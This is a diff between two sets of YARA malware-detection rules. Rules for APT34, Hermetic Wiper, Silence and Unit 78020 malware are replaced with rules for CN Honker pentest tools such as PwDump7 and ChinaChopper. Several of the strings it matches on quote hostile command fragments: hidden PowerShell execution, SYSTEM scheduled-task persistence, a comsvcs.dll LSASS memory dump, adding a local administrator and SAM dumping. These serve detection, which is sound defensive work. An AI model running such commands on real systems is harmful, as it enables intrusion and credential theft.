-		id = "8ddfa59d-9b8a-5cb6-a992-6498ac9be75d"
-		date = "2017-12-07"
+		id = "832e4998-64fc-5f34-a46d-aeefde0ee763"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt34.yar#L34-L59"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L414-L431"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "71840d9a0f8a5dc39656e6bf1ad94fa275bcd18baf6b374dfe040c161d62a960"
-		score = 75
+		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"
+		logic_hash = "0f7630b2ec983df2a065b049000cef6de38f884254748a342b2fd84d8c5985af"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c75c85acf0e0092d688a605778425ba4cb2a57878925eee3dc0f4dd8d636a27a"
 
 	strings:
-		$x1 = "\\obj\\Debug\\exeruner.pdb" ascii
-		$x2 = "\"wscript.shell`\")`nShell0.run" wide
-		$x3 = "powershell.exe -exec bypass -enc \" + ${global:$http_ag} +" wide
-		$x4 = "/c powershell -exec bypass -window hidden -nologo -command " fullword wide
-		$x5 = "\\UpdateTasks\\JavaUpdatesTasksHosts\\" wide
-		$x6 = "schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn" wide
-		$x7 = "UpdateChecker.ps1 & ping 127.0.0.1" wide
-		$s8 = "exeruner.exe" fullword wide
-		$s9 = "${global:$address1} = $env:ProgramData + \"\\Windows\\Microsoft\\java\";" fullword wide
-		$s10 = "C:\\ProgramData\\Windows\\Microsoft\\java" fullword wide
-		$s11 = "function runByVBS" fullword wide
-		$s12 = "$84e31856-683b-41c0-81dd-a02d8b795026" fullword ascii
-		$s13 = "${global:$dns_ag} = \"aQBmACAAKAAoAEcAZQB0AC0AVwBtAGk" wide
+		$s1 = "http://www.md5.com.cn" fullword wide
+		$s2 = "ListBox_Command" fullword wide
+		$s3 = "\\Set.ini" wide
+		$s4 = "OpenFileDialog1" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 740KB and all of them
 }
-rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Feb22_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Havij_Havij : FILE
 {
 	meta:
-		description = "Detects Hermetic Wiper malware"
+		description = "Sample from CN Honker Pentest Toolset - file Havij.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2cbe4a69-e31a-5f5f-ab1a-9d71d16fb30f"
-		date = "2022-02-24"
+		id = "b3640a32-b546-58c9-abb1-3da60dc6633c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_hermetic_wiper.yar#L2-L38"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L433-L448"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1cf124f7533a060da8aff1a18f64a94b183502e58ffdfca012d72d99d30225ba"
-		score = 75
+		hash = "0d8b275bd1856bc6563dd731956f3b312e1533cd"
+		logic_hash = "e8aff3e1e536cd35b10bdaab4818542bce284e7ed3aa7ef1920763669faf4c8a"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da"
-		hash2 = "3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767"
-		hash3 = "2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf"
-		hash4 = "1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$xc1 = { 00 5C 00 5C 00 2E 00 5C 00 50 00 68 00 79 00 73
-               00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76
-               00 65 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
-               00 45 00 50 00 4D 00 4E 00 54 00 44 00 52 00 56
-               00 5C 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
-               00 00 00 00 00 25 00 73 00 25 00 2E 00 32 00 73
-               00 00 00 00 00 24 00 42 00 69 00 74 00 6D 00 61
-               00 70 00 00 00 24 00 4C 00 6F 00 67 00 46 00 69
-               00 6C 00 65 }
-		$sc1 = { 00 44 00 72 00 69 00 76 00 65 00 72 00 73 00 00
-               00 64 00 72 00 76 00 00 00 53 00 79 00 73 00 74
-               00 65 00 6D 00 33 00 32 }
-		$s1 = "\\\\?\\C:\\Windows\\System32\\winevt\\Logs" wide fullword
-		$s2 = "\\\\.\\EPMNTDRV\\%u" wide fullword
-		$s3 = "DRV_XP_X64" wide fullword
-		$s4 = "%ws%.2ws" wide fullword
-		$op1 = { 8b 7e 08 0f 57 c0 8b 46 0c 83 ef 01 66 0f 13 44 24 20 83 d8 00 89 44 24 18 0f 88 3b 01 00 00 }
-		$op2 = { 13 fa 8b 55 f4 4e 3b f3 7f e6 8a 45 0f 01 4d f0 0f 57 c0 }
+		$s1 = "User-Agent: %Inject_Here%" fullword wide
+		$s2 = "BACKUP database master to disk='d:\\Inetpub\\wwwroot\\1.zip'" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a53 or uint16( 0 ) == 0x5a4d ) and filesize < 400KB and ( 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Artefacts_Feb22_1
+rule SIGNATURE_BASE_CN_Honker_Exp_Ms11011 : FILE
 {
 	meta:
-		description = "Detects artefacts found in Hermetic Wiper malware related intrusions"
+		description = "Sample from CN Honker Pentest Toolset - file ms11011.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "77f793c1-b02c-59c3-b3e4-75758f5b3b8d"
-		date = "2022-02-25"
+		id = "fc092166-73cd-58f6-b034-a2fe2c5fb859"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_hermetic_wiper.yar#L40-L70"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L450-L468"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e917618a5172c68b4b32ba9e63402c2a98ccb027276b317ec169a4fef219de1"
-		score = 75
+		hash = "5ad7a4962acbb6b0e3b73d77385eb91feb88b386"
+		logic_hash = "f92d71f163a49a158d85b821d71fd17e84e0d3deb19515ae0cf6a063a05c027b"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sx1 = "/c powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump" ascii wide
-		$sx2 = "appdata\\local\\microsoft\\windows\\winupd.log" ascii wide
-		$sx3 = "AppData\\Local\\Microsoft\\Windows\\Winupd.log" ascii wide
-		$sx4 = "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1" ascii wide
-		$sx5 = "\\policydefinitions\\postgresql.exe" ascii wide
-		$sx6 = "powershell -v 2 -exec bypass -File text.ps1" ascii wide
-		$sx7 = "powershell -exec bypass gp.ps1" ascii wide
-		$sx8 = "powershell -exec bypass -File link.ps1" ascii wide
-		$sx9 = " 1> \\\\127.0.0.1\\ADMIN$\\__16" ascii wide
-		$sa1 = "(New-Object System.Net.WebClient).DownloadFile(" ascii wide
-		$sa2 = "CSIDL_SYSTEM_DRIVE\\temp\\" ascii wide
-		$sa3 = "1> \\\\127.0.0.1\\ADMIN$" ascii wide
-		$fp1 = "<html" ascii
+		$s0 = "\\i386\\Hello.pdb" ascii
+		$s1 = "OS not supported." fullword ascii
+		$s2 = ".Rich5" fullword ascii
+		$s3 = "Not supported." fullword wide
+		$s5 = "cmd.exe" fullword ascii
 
 	condition:
-		1 of ( $sx* ) or all of ( $sa* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1
+rule SIGNATURE_BASE_CN_Honker_DLL_Passive_Privilege_Escalation_Ws2Help : FILE
 {
 	meta:
-		description = "Detects scheduled task pattern found in Hermetic Wiper malware related intrusions"
+		description = "Sample from CN Honker Pentest Toolset - file ws2help.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a628f773-9c71-5979-a4db-37b6b6bd6a56"
-		date = "2022-02-25"
+		id = "85a07bb7-2856-56f0-bd15-e020bb2a7692"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_hermetic_wiper.yar#L72-L88"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L470-L485"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "56368ba1c97fe3455312b6ee86dcd1a21677f7dfa3836e76ada4b236a5b2c171"
-		score = 85
+		hash = "e539b799c18d519efae6343cff362dcfd8f57f69"
+		logic_hash = "e13f33e48d5c1aeaef6c50287f74e03fb7b65667d597768d448e76f5a375b34f"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a0 = "<Task version=" ascii wide
-		$sa1 = "CSIDL_SYSTEM_DRIVE\\temp" ascii wide
-		$sa2 = "postgresql.exe 1> \\\\127.0.0.1\\ADMIN$" ascii wide
-		$sa3 = "cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE" ascii wide
+		$s0 = "PassMinDll.dll" fullword ascii
+		$s1 = "\\ws2help.dll" ascii
 
 	condition:
-		$a0 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them
 }
-
-rule SIGNATURE_BASE_Silence_Malware_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell : FILE
 {
 	meta:
-		description = "Detects malware sample mentioned in the Silence report on Securelist"
+		description = "Sample from CN Honker Pentest Toolset - file Webshell.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f932e3fe-a2d7-55b7-b581-88c0ed45723e"
-		date = "2017-11-01"
+		id = "12870766-2b85-522d-9ad8-abba2786caaf"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/the-silence/83009/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_silence.yar#L13-L38"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L487-L503"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b88795268c080fe19f7e185d1542b520616fe6c00bae23a99981aa1ee8abacb3"
-		score = 75
+		hash = "c85bd09d241c2a75b4e4301091aa11ddd5ad6d59"
+		logic_hash = "d48a10313afcb5a2084229937703bbc11958a5cd11f8f27fbc8dae15ddfd5ed1"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f24b160e9e9d02b8e31524b8a0b30e7cdc66dd085e24e4c58240e4c4b6ec0ac2"
 
 	strings:
-		$x1 = "adobeudp.exe" fullword wide
-		$x2 = "%s\\adobeudp.exeZone.Identifier" fullword ascii
-		$x3 = "%s\\igfxpers_%08x.exe" fullword ascii
-		$x4 = "%s\\adobeudp.exe" fullword ascii
-		$s1 = "SoftWare\\MicroSoft\\Windows\\CurrentVersion\\Run" fullword ascii
-		$s2 = "Copyright (C)  1999 - 2017" fullword wide
-		$s3 = "%sget.php?name=%x" fullword ascii
-		$s4 = "VNASSRUNXYC" fullword wide
+		$s1 = "Windows NT users: Please note that having the WinIce/SoftIce" fullword ascii
+		$s2 = "Do you want to cancel the file download?" fullword ascii
+		$s3 = "Downloading: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e03edb9bd7cbe200dc59f361db847f8a" or 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 381KB and all of them
 }
-
-rule SIGNATURE_BASE_Silence_Malware_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Aspxclient : FILE
 {
 	meta:
-		description = "Detects malware sample mentioned in the Silence report on Securelist"
+		description = "Sample from CN Honker Pentest Toolset - file AspxClient.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4c7d753-fd04-5e11-9960-1ad238039c11"
-		date = "2017-11-01"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/the-silence/83009/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_silence.yar#L40-L64"
+		id = "7e38365c-ffe5-5fcd-8bd6-948d255d6e10"
+		date = "2015-06-23"
+		modified = "2022-12-21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L505-L523"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8cb6320eac984b7a332c1c84582a7ca7e90d409e518106c4e7655948f6863889"
-		score = 75
+		hash = "67569a89128f503a459eab3daa2032261507f2d2"
+		logic_hash = "4d0a93434673952fed38e384db526275b9eb32bac9a207c91f792d4d113c40f1"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "75b8f534b2f56f183465ba2b63cfc80b7d7d1d155697af141447ec7144c2ba27"
 
 	strings:
-		$x1 = "\\ScreenMonitorService\\Release\\smmsrv.pdb" ascii
-		$x2 = "\\\\.\\pipe\\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB}" fullword ascii
-		$s1 = "My Sample Service: ServiceMain: SetServiceStatus returned error" fullword ascii
-		$s2 = "\\mss.exe" ascii
-		$s3 = "\\out.dat" ascii
-		$s4 = "\\mss.txt" ascii
-		$s5 = "Default monitor" fullword ascii
+		$s1 = "\\tools\\hashq\\hashq.exe" wide
+		$s2 = "\\Release\\CnCerT.CCdoor.Client.pdb" ascii
+		$s3 = "\\myshell.mdb" wide
+		$s4 = "injectfile" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "69f3ec173efb6fd3ab5f79e0f8051335" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 5 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 3 of them
 }
-rule SIGNATURE_BASE_Tempracer : FILE
+rule SIGNATURE_BASE_CN_Honker_Fckeditor : FILE
 {
 	meta:
-		description = "Detects privilege escalation tool - file TempRacer.exe"
+		description = "Sample from CN Honker Pentest Toolset - file Fckeditor.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "edba6471-9720-5aad-8c15-386197700c83"
-		date = "2016-03-30"
+		id = "eb8767cb-b081-5c37-b7ad-57a0de047462"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_tempracer.yar#L10-L27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L525-L540"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e17d80c4822d16371d75e1440b6ac44af490b71fbee1010a3e8a5eca94d22bb3"
-		logic_hash = "37355456e13ea9fa6429b68970e0450f4ddbd8da81c070a0383b1e048a05e35a"
-		score = 75
+		hash = "4b16ae12c204f64265acef872526b27111b68820"
+		logic_hash = "0fd231fc81b2b7b5647a8016774f35751ac68646856a15c17ce4d2c07eaf1761"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "\\obj\\Release\\TempRacer.pdb" ascii
-		$s2 = "[+] Injecting into " fullword wide
-		$s3 = "net localgroup administrators alex /add" fullword wide
-		$s4 = "[+] File: {0} renamed to {1}" fullword wide
-		$s5 = "[+] Blocking " fullword wide
+		$s0 = "explorer.exe http://user.qzone.qq.com/568148075" fullword wide
+		$s7 = "Fckeditor.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 25KB and 1 of them ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1340KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_CN_Unit78020_Sep15 : FILE
+rule SIGNATURE_BASE_CN_Honker_Codeeer_Explorer : FILE
 {
 	meta:
-		description = "Detects malware used by Unit78020"
+		description = "Sample from CN Honker Pentest Toolset - file Codeeer Explorer.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d26d401f-3806-5a0b-bdb3-87d5d8af209c"
-		date = "2015-09-24"
-		modified = "2023-01-31"
-		old_rule_name = "Unit78020_Malware_Gen1"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L8-L58"
+		id = "d4a88ae7-c0b2-57d2-a070-3dd748a30a3a"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L542-L557"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85244d4e2b9e03fa4ab8268ffbedffb839bca598b1e863d3d0b3914294d3ddf0"
-		score = 80
-		quality = 83
+		hash = "f32e05f3fefbaa2791dd750e4a3812581ce0f205"
+		logic_hash = "299d0181beb5032dcb327516a7526d6131e2212623ffa9e592f54f80473b098d"
+		score = 70
+		quality = 85
 		tags = "FILE"
-		hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72"
-		hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
-		hash3 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
-		hash4 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
-		hash5 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
-		hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "greensky27.vicp.net" fullword wide
-		$x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii
-		$x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii
-		$x4 = "serch.vicp.net" fullword wide
-		$x5 = "greensky27.vicp.net" fullword wide
-		$x6 = "greensky27.vicp.net.as" fullword wide
-		$x7 = "greensky27.vcip.net" fullword wide
-		$x8 = "pnoc-ec.vicp.net" fullword wide
-		$x9 = "aseanph.vicp.net" fullword wide
-		$x10 = "pnoc.vicp.net" fullword wide
-		$sa1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" wide fullword
-		$sa2 = "x-www-form-urlencoded/r/n" wide fullword
-		$sa3 = "/%d%s%d" ascii fullword
-		$sa4 = "dMozilla" wide fullword
-		$sa5 = "Accept-Language:En-us" wide fullword
-		$sb1 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" wide fullword
-		$sb2 = "\\Office Start.lnk" wide fullword
-		$sb3 = "%02d-%02d-%02d %02d:%02d" wide fullword
-		$sc1 = "\\MSN Talk Start.lnk" wide fullword
-		$sc2 = "-GetModuleFileNameExW" ascii fullword
-		$sc3 = "dwError1 = %d" ascii fullword
+		$s2 = "Codeeer Explorer.exe" fullword wide
+		$s12 = "webBrowser1_ProgressChanged" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or all of ( $sc* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 470KB and all of them
 }
-rule SIGNATURE_BASE_Unit78020_Malware_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Swordhonkeredition : FILE
 {
 	meta:
-		description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe"
+		description = "Sample from CN Honker Pentest Toolset - file SwordHonkerEdition.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0374de68-98cb-5cb8-a936-fe7845de9330"
-		date = "2015-09-24"
+		id = "5688fa03-bcb0-545d-9fdf-7ab48a389424"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L60-L78"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L559-L575"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a"
-		logic_hash = "589dfb39630fd396b1f8c5d9d0ecccfc058edfd8e74e3bd06d1bfb9f91ad1798"
-		score = 75
+		hash = "3f9479151c2cada04febea45c2edcf5cece1df6c"
+		logic_hash = "cc18e68f7c3eff69a75333f3b605c89b024c6763f7b97e0ce20ce14bfe28df0d"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii
-		$s2 = "msictl.exe" fullword ascii
-		$s3 = "127.0.0.1:8080" fullword ascii
-		$s4 = "mshtml.dat" fullword ascii
-		$s5 = "msisvc" fullword ascii
-		$s6 = "NOKIAN95/WEB" fullword ascii
+		$s0 = "\\bin\\systemini\\MyPort.ini" wide
+		$s1 = "PortThread=200 //" fullword wide
+		$s2 = " Port Open -> " fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 160KB and 4 of them
+		uint16( 0 ) == 0x5a4d and filesize < 375KB and all of them
 }
-rule SIGNATURE_BASE_Unit78020_Malware_Gen2 : FILE
+rule SIGNATURE_BASE_CN_Honker_HASH_Pwdump7 : FILE
 {
 	meta:
-		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule"
+		description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9492b1f8-c2a9-5e3b-ad62-fbc3d99392b3"
-		date = "2015-09-24"
+		id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L80-L101"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L577-L594"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fd3cb904499a985830543174126761a3cdcff134d61b93b1105a489c00bd042f"
-		score = 75
+		hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
+		logic_hash = "05f735ba3f377f71ccf3a97b3597cee7b9f36213ee2ebba19db69667529d9fac"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd"
-		hash2 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af"
-		hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a"
 
 	strings:
-		$s0 = "-GetModuleFileNameExW" fullword ascii
-		$s1 = "\\MSN Talk Start.lnk" wide
-		$s2 = ":SeDebugPrivilege" fullword wide
-		$s3 = "WinMM Version 1.0" fullword wide
-		$s4 = "dwError1 = %d" fullword ascii
-		$s5 = "*Can't Get" fullword wide
+		$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii
+		$s2 = "No Users key!" fullword ascii
+		$s3 = "NO PASSWORD*********************:" fullword ascii
+		$s4 = "Unable to dump file %S" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of them
 }
-rule SIGNATURE_BASE_Unit78020_Malware_Gen3 : FILE
+rule SIGNATURE_BASE_CN_Honker_Chinachopper : FILE
 {
 	meta:
-		description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong"
+		description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e26f386e-e98c-5005-9343-1873d2e35a1f"
-		date = "2015-09-24"
+		id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_unit78020_malware.yar#L103-L132"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L596-L612"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "304b3f429e144f1f4b0f7794e77f3059ec6b3e5c6fdf4c7b820a77db1cf8cfcb"
-		score = 75
+		hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
+		logic_hash = "e5e6a8a17592e7c82af830153905a52f8202a65c8e2f4b09dbebb19d04e2f8d7"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac"
-		hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2"
 
 	strings:
-		$x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
-		$x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii
-		$x3 = "J:\\chong\\" ascii
-		$s1 = "User-Agent: Netscape" fullword ascii
-		$s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii
-		$s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide
